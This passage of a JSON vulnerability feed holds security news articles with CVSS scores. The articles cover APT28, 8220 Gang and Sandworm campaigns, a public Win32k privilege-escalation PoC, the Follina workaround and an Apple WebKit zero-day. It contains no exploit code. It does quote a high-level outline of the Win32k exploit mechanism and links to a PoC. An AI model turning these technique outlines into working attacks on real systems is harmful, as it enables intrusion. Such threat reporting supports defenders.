\"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. 
\"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSHTML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix, told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 
infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using 
a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling cryptocurrency prices, and it underscores a heightened \"battle\" among competing cryptojacking-focused groups for control of victim systems.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. 
It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e100/link.jpg>)\n\nRussia's invasion of Ukraine has also had the group unleash numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. 
government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nIn the attacks, the fraudulent domains host a web page purportedly about the \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name suggests, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarity with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an 
innocuous decoy document \u2013 an application for Ukrainian citizens to request monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "Security teams might have skipped January\u2019s Patch Tuesday after reports of it breaking servers, but it also 
included a patch for a privilege-escalation bug in Windows 10 that leaves unpatched systems open to malicious actors looking for administrative access. It\u2019s a bug that now has a proof-of-concept exploit [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>).\n\nThe exploit was released by Gil Dabah, founder and CEO of Privacy Piiano, who tweeted that he decided not to report the bug two years ago after finding it difficult to get paid on other bug bounties through the Microsoft program.\n\n> Found it two years ago. Not recently. That\u2019s the point. <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 26, 2022](<https://twitter.com/_arkon/status/1486449470741135362?ref_src=twsrc%5Etfw>)\n\n## **The LPE Bug**\n\n\u201cA local, authenticated attacker could gain elevated local system or [administrator privileges](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) through a vulnerability in the Win32k.sys driver,\u201d Microsoft explained in its advisory, part of [January\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>).\n\nThe [disclosure for CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) from RyeLv, who is credited with the find, was published on Jan. 13 and described the [win32k object type confusion](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) vulnerability.\n\n\u201cThe attacker can call the relevant GUI API at the user_mode to make the kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc.,\u201d the disclosure by RyeLv said.\n\n\u201cThese kernel functions will trigger a callback xxxClientAllocWindowClassExtraBytes. 
Attacker can intercept this callback through hook xxxClientAllocWindowClassExtraBytes in KernelCallbackTable, and use the NtUserConsoleControl method to set the ConsoleWindow flag of the tagWND object, which will modify the window type.\u201d\n\nThe bug was being exploited by sophisticated groups as a zero-day issue, Microsoft said.\n\n> Regarding the just-fixed CVE-2022-21882: \n> win32k privilege escalation vulnerability, \n> CVE-2021-1732 patch bypass, easy to exploit, which was used by apt attacks\n> \n> \u2014 b2ahex (@b2ahex) [January 12, 2022](<https://twitter.com/b2ahex/status/1481233350840893442?ref_src=twsrc%5Etfw>)\n\n## **Microsoft Needs to Up Its Bug Bounty Game?**\n\nJanuary\u2019s Patch Tuesday was plagued by [Windows server update issues](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) that could have understandably made internal security teams pause before downloading the patches. But a PoC is now available for the bug, putting exploitation in reach of cybercriminals of all levels of expertise.\n\nDabah said that Microsoft\u2019s bug-bounty program was problematic.\n\n> The reason I didn\u2019t disclose it was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. 
[@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nInvesting in the program was the primary recommendation in RyeLv\u2019s technical analysis to Microsoft.\n\nHe noted how to \u201ckill the bug class\u201d: \u201cImprove the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.\u201d\n\nIt should be noted that Microsoft has been willing to throw additional funding at [bug-bounty programs](<https://threatpost.com/microsoft-30k-teams-bugs/165037/>) for other high-profile products, including last spring\u2019s announcement the company would pay up to $30,000 for Teams bugs.\n\nThe computing giant did not immediately return a request for comment.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-31T21:59:35", "type": "threatpost", "title": "Public Exploit Released for Windows 10 Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, 
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-01-31T21:59:35", "id": "THREATPOST:9673D04DAD513AC05EA6440633D75339", "href": "https://threatpost.com/public-exploit-windows-10-bug/178135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote code execution (RCE) flaw, tracked as [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. 
Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>) \u2013 with attackers apparently targeting Russian users \u2013 and reported it to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. 
It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who [tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend, noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining that the zero-day code references the Italian area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL protocol to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in its advisory.\n\nTo do this, users must follow these steps: run **Command Prompt as Administrator**; back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201d; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app, then by default Office opens documents from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. 
However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-30190 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is that it executes without action from end users, both Beaumont and Grafi said. 
Once the HTML is loaded from the calling application, an MSDT scheme is used to execute PowerShell code that runs a malicious payload, Grafi explained.\n\nSince the flaw abuses the remote template feature in Microsoft Word, it does not depend on a typical macro-based exploit path, which is common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>), tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long term, especially with the bug under attack, Grafi said. 
He said the workaround is \u201cnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-11T17:01:28", "description": "Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors already are actively exploiting to compromise iPhones, iPads and macOS devices.\n\nThe zero-day, tracked as CVE-2022-22620, is a use-after-free issue, which is related to incorrect use of dynamic memory during program operation.\n\nIn the case of Apple\u2019s zero-day, threat actors 
can execute arbitrary code on affected devices after they process maliciously crafted web content, the company said in a [description of the bug](<https://support.apple.com/en-us/HT213092>). The flaw also can lead to unexpected OS crashes.\n\n\u201cApple is aware of a report that this issue may have been actively exploited,\u201d the company wrote in its update notes.\n\nThe simplest way threat actors can exploit the flaw involves the system\u2019s reuse of freed memory, according to the vulnerability\u2019s description on the Common Weakness Enumeration website. \u201cReferencing memory after it has been freed can cause a program to crash, use unexpected values or execute code,\u201d according to the [post](<https://cwe.mitre.org/data/definitions/416.html>).\n\nExploiting previously freed memory can have various adverse consequences, \u201cranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw,\u201d the description said.\n\n## **Memory Error**\n\nThese types of errors typically have two common and sometimes overlapping causes: error conditions and other exceptional circumstances, and confusion over which part of the program is responsible for freeing the memory, according to the post.\n\nIn the case of CVE-2022-22620, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation.\n\n\u201cAs the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process,\u201d according to the post.\n\nIf the newly allocated data happens to hold a class \u2013 for example, in C++ code \u2013 various function pointers may be scattered within the heap data. 
\u201cIf one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved,\u201d Apple\u2019s post explained.\n\n## **Numerous Devices Affected**\n\nApple released separate security updates for its products to address the issue \u2013 [macOS Monterey 12.2.1](<https://support.apple.com/en-us/HT213092>), [iOS 15.3.1 and iPadOS 15.3.1](<https://support.apple.com/en-us/HT213093>). Both updates improve how the OSes manage memory.\n\nThe flaw affects numerous Apple devices, including iPhone 6s and later; all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch 7th generation. It also affects desktops and notebooks running macOS Monterey.\n\nThe update is the second time this year that Apple has had to issue a patch for a zero day. [Last month](<https://threatpost.com/apple-zero-day-security-exploited/178040/>), the company also had to patch a memory issue \u2013 a zero-day flaw also affecting iOS, iPadOS and macOS Monterey tracked as [CVE-2022-22587](<https://packetstormsecurity.com/files/cve/CVE-2022-22587>). Attackers could exploit the bug using a malicious app to execute arbitrary code with kernel privileges.\n\nAt the same time, the company patched another WebKit zero-day tracked as [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>). 
The information-disclosure issue affects browsers for macOS, iOS and iPadOS and allows a snooping website to find out information about other tabs a user might have open.\n\nLast year Apple also patched several zero-day vulnerabilities, including [a zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) exploited by the NSO Group\u2019s Pegasus spyware and [a memory-corruption flaw](<https://threatpost.com/apple-patches-actively-exploited-zero-day-in-ios-macos/168177/>) in its iOS and macOS platforms that could allow for system takeover.\n\n## How to Force an Update if Necessary\n\nAs is typical for Apple, it didn\u2019t disclose many details of the vulnerability and won\u2019t until the investigation is completed. At any rate, \u201cthe majority of users have the patches installed,\u201d pointed out Kaspersky in an early morning Friday [post](<https://www.kaspersky.com/blog/webkit-vulnerability-cve-2022-22620/43650/>). \u201cSimply put, the most likely attack scenario is an infection of an iPhone or iPad device after visiting a malicious web page,\u201d noted the security firm\u2019s post.\n\nInstalling the iOS 15.3.1 and iPadOS 15.3.1 updates will protect your device, though it does 